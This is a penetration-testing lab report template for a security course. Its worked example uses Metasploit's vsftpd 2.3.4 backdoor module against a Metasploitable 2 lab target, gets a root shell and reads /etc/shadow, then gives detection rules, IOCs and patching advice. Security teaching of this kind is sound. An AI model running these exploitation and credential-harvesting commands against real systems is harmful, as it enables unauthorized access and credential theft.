# LAB REPORT TEMPLATE # Apophis Networking Security Lab **Student Name:** ___________________________ **Module Number:** ___________________________ **Lab Title:** ___________________________ **Date Submitted:** ___________________________ --- ## 1. EXECUTIVE SUMMARY (1 paragraph) Provide a high-level overview of the lab objectives, key findings, and outcomes. This should be understandable by non-technical stakeholders. **Example:** > This lab focused on exploiting the vsftpd 2.3.4 backdoor vulnerability (CVE-2011-2523) on a Metasploitable 2 target system. The exploitation was successful, resulting in root-level access to the target. Post-exploitation activities included credential harvesting and persistence establishment. This exercise demonstrated the critical importance of patch management and network segmentation in preventing unauthorized access. --- ## 2. OBJECTIVES List the specific learning objectives for this lab. **Example:** - Configure and execute Metasploit Framework exploits - Understand the mechanics of reverse shell payloads - Perform post-exploitation enumeration - Document exploitation chains for penetration testing reports --- ## 3. TOOLS & ENVIRONMENT ### 3.1 Attack Platform - **OS:** Kali Linux 2024.1 - **IP Address:** 10.10.2.50 - **Tools Used:** - Metasploit Framework v6.3.x - Nmap 7.94 - Wireshark 4.0.x ### 3.2 Target System - **OS:** Metasploitable 2 (Ubuntu 8.04) - **IP Address:** 10.10.4.10 - **Vulnerable Services:** - vsftpd 2.3.4 (Port 21) - OpenSSH 4.7p1 (Port 22) - Apache 2.2.8 (Port 80) ### 3.3 Network Topology ``` [Kali Linux] [pfSense Firewall] [Metasploitable 2] 10.10.2.50 <---> 10.10.2.1 | 10.10.4.1 <---> 10.10.4.10 VLAN 200 VLAN 400 (Red Team) (Victim Network) ``` --- ## 4. METHODOLOGY Describe the step-by-step process followed during the lab. Use numbered steps and include relevant commands. ### 4.1 Pre-Exploitation: Reconnaissance **Step 1: Host Discovery** ```bash nmap -sn 10.10.4.0/24 ``` **Output:** ``` Nmap scan report for 10.10.4.10 Host is up (0.00042s latency). ``` **Step 2: Port Scanning** ```bash sudo nmap -sS -sV -p- 10.10.4.10 -oA full_scan ``` **Output:** ``` PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 ... ``` **Analysis:** vsftpd 2.3.4 identified—known to contain backdoor vulnerability (CVE-2011-2523). ### 4.2 Exploitation **Step 3: Launch Metasploit** ```bash msfconsole -q ``` **Step 4: Select Exploit Module** ```bash msf6 > use exploit/unix/ftp/vsftpd_234_backdoor msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.4.10 msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit ``` **Output:** ``` [*] 10.10.4.10:21 - Banner: 220 (vsFTPd 2.3.4) [*] 10.10.4.10:6200 - Shell command shell session 1 opened ``` **Result:** Successful exploitation. Root shell obtained. ### 4.3 Post-Exploitation **Step 5: Verify Access** ```bash id ``` **Output:** ``` uid=0(root) gid=0(root) ``` **Step 6: Credential Harvesting** ```bash cat /etc/shadow ``` **Output:** (Include first 3 lines only for report) ``` root:$1$XjpI2OBz$...:0:0:root:/root:/bin/bash daemon:*:14684:0:99999:7::: ... ``` --- ## 5. FINDINGS & ANALYSIS ### 5.1 Key Discoveries **Vulnerability Identified:** - **CVE:** CVE-2011-2523 - **Severity:** Critical (CVSS 10.0) - **Description:** vsftpd 2.3.4 contains malicious backdoor code that opens shell access on port 6200 when username contains `:)` smiley face. - **Exploitability:** Trivial—no authentication required. **Impact Assessment:** - **Confidentiality:** HIGH—Full read access to all files including /etc/shadow - **Integrity:** HIGH—Root access allows file modification - **Availability:** HIGH—Attacker could delete files or crash system ### 5.2 Network Traffic Analysis **Wireshark Observations:** - TCP stream 1: FTP connection (port 21) with malicious username - TCP stream 2: Shell session on port 6200 - No encryption—all commands visible in plaintext **Screenshot:** [Include Wireshark screenshot showing backdoor traffic] --- ## 6. INDICATORS OF COMPROMISE (IOCs) | Type | Value | Description | |------|-------|-------------| | IP Address | 10.10.2.50 | Attacker source IP | | Port | 6200 | vsftpd backdoor listening port | | Process | vsftpd | Spawned root shell (suspicious parent) | | Network | TCP SYN to 6200 | Connection to non-standard FTP port | --- ## 7. DEFENSIVE RECOMMENDATIONS ### 7.1 Immediate Actions 1. **Patch vsftpd:** Upgrade to version 3.0.5 or disable service if not needed 2. **Network Segmentation:** Block victim network from initiating connections to Red Team VLAN 3. **IDS Rule:** Deploy Suricata signature for port 6200 connections ### 7.2 Long-Term Improvements 1. **Vulnerability Management:** Implement automated scanning (weekly) 2. **Patch Management:** Establish SLA for critical patches (24-48 hours) 3. **Firewall Rules:** Default-deny egress from victim network 4. **Security Monitoring:** Alert on connections to non-standard ports --- ## 8. DETECTION ENGINEERING ### 8.1 Suricata Rule ``` alert tcp any any -> any 6200 (msg:"vsftpd 2.3.4 Backdoor Connection"; flow:established,to_server; sid:1000050; rev:1;) ``` ### 8.2 Security Onion Query (KQL) ``` destination.port: 6200 AND event.module: "suricata" ``` ### 8.3 MITRE ATT&CK Mapping - **Tactic:** Initial Access (TA0001) - **Technique:** T1190 - Exploit Public-Facing Application - **Sub-Technique:** FTP Service Exploitation --- ## 9. CHALLENGES & TROUBLESHOOTING **Challenge 1:** Initial exploit failed with "connection refused" **Root Cause:** VLAN tag not set correctly on VM network interface in Proxmox. **Solution:** ```bash # Proxmox VM > Hardware > Network Device > Edit # VLAN Tag: 400 (was blank) ``` **Challenge 2:** Wireshark showed no captured packets **Root Cause:** Capturing on wrong interface (wlan0 instead of eth0). **Solution:** ```bash sudo tcpdump -i eth0 # Verify interface has traffic sudo wireshark -i eth0 ``` --- ## 10. LESSONS LEARNED ### What Went Well - Successful identification and exploitation of vulnerability - Comprehensive documentation with screenshots - Effective use of network segmentation for safe testing ### What Could Be Improved - Faster troubleshooting (spent 30 minutes on VLAN issue) - More thorough initial reconnaissance (missed some services) - Should have taken VM snapshot before exploitation ### Key Takeaways 1. **Offensive Perspective:** Outdated software is trivially exploitable—attackers have automated scanners for this. 2. **Defensive Perspective:** One unpatched service can compromise entire network. Defense-in-depth is critical. 3. **Forensics Importance:** Without packet capture, proving the attack vector would be difficult in IR scenario. --- ## 11. APPENDICES ### Appendix A: Command History ```bash # Full command history from Kali terminal history > command_history.txt ``` (Attach file: command_history.txt) ### Appendix B: Screenshots - Screenshot 1: Nmap scan results showing vsftpd 2.3.4 - Screenshot 2: Metasploit successful exploitation - Screenshot 3: Root shell access (id command output) - Screenshot 4: Wireshark PCAP showing port 6200 connection - Screenshot 5: Security Onion alert for detection ### Appendix C: Packet Capture (Attach file: exploitation.pcapng) ### Appendix D: Metasploit Output Log (Attach file: msfconsole.log) --- ## 12. REFERENCES 1. National Vulnerability Database. (2011). CVE-2011-2523. Retrieved from https://nvd.nist.gov/vuln/detail/CVE-2011-2523 2. Rapid7. (2024). Metasploit Framework Documentation. Retrieved from https://docs.rapid7.com/metasploit/ 3. MITRE Corporation. (2024). ATT&CK Framework - T1190. Retrieved from https://attack.mitre.org/techniques/T1190/ 4. OWASP. (2021). Top 10 Web Application Security Risks. Retrieved from https://owasp.org/Top10/ --- ## 13. DECLARATION I certify that this lab report represents my own work and that all tools were used in an authorized, ethical manner within the confines of my personal lab environment. I understand that unauthorized computer access is illegal. **Signature:** ___________________________ **Date:** ___________________________ --- **END OF LAB REPORT** --- # GRADING RUBRIC FOR THIS REPORT | Section | Points | Criteria | |---------|--------|----------| | Executive Summary | 5 | Clear, concise, non-technical language | | Methodology | 20 | Step-by-step, reproducible, includes commands | | Findings & Analysis | 20 | Technical depth, vulnerability details, impact | | Screenshots | 15 | Relevant, annotated, high-quality | | Detection Engineering | 15 | Custom rules, MITRE mapping, queries | | Defensive Recommendations | 10 | Actionable, prioritized, realistic | | Lessons Learned | 5 | Self-reflection, improvement mindset | | Documentation Quality | 10 | Formatting, grammar, professionalism | | **TOTAL** | **100** | | **Minimum Passing Score:** 70/100